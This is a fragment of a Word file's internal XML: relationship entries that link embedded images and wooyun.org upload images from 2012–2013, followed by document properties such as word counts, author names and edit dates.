Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/311805344637b9ae6a8e600eb61c0024f879adb4.jpg" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/0103185879234a8dec09bef87c02fc631350ec3b.jpg" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/011959161519860ac7e4867c7b77dbb71f3da484.jpg" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/142132360f331fca8e91a8b3f8feda590e01dd40.jpg" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/191545294eb78ff9aa1baf1296bf17d4299b4189.jpg" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/131945143a1a6ebfa1fe861100de697e8a9421cc.jpg" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/17202009e33ecf45900f14061aea01e087906ed3.jpg" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/18221528690e31de257c78bf70f4b5f8101409a5.jpg" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2415472178baeea13c310cb3017d2e9c1b635770.jpg" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2612504437ca8c7fecb2736c72074c7cd554337b.jpg" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/2717303008ca6c5f5744dac17f6583931eb896b1.jpg" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/29175702f2ec195ae2f30fc559747c2fe2b71acb.jpg" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201301/0103195196d0072e0bdf88ab8d45dfb13ccb5492.jpg" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/14125606c3be133719358dab2be84372a0d46f6c.jpg" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/20152420febd554d430e49ca469b27ca886651c0.jpg" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/26125125e32dcdce4cfc138e74f406c5a5d84a26.jpg" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpeg"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/31181015f9ee032910ea0113451aa3e47a56d1f7.jpg" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/3118060792ca9b9cb88230509ddf16a8bf6bede9.jpg" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/141108063a03406df7d7c0ec3ae0c66f3f270ae1.jpg" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/172021196e3df63081f0ae231418c04b4075ff41.jpg" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/19154453ad45121c6694123e384734c0ba5b6d4e.jpg" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/25233313b66f8fdd0928580a279927658a2451c8.jpg" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/1822150584b08c08bef52c17f3645b2dba02f1a6.jpg" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpeg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wooyun.org/upload/201212/29194822a240c052bf552b7b76bcb59eac069126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087C-5A13-4400-9D59-BFD6762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3</Pages>
  <Words>7527</Words>
  <Characters>42908</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>357</Lines>
  <Paragraphs>100</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5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ui</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>buffer</cp:lastModifiedBy>
  <cp:revision>173</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-01-19T05:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-21T13:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>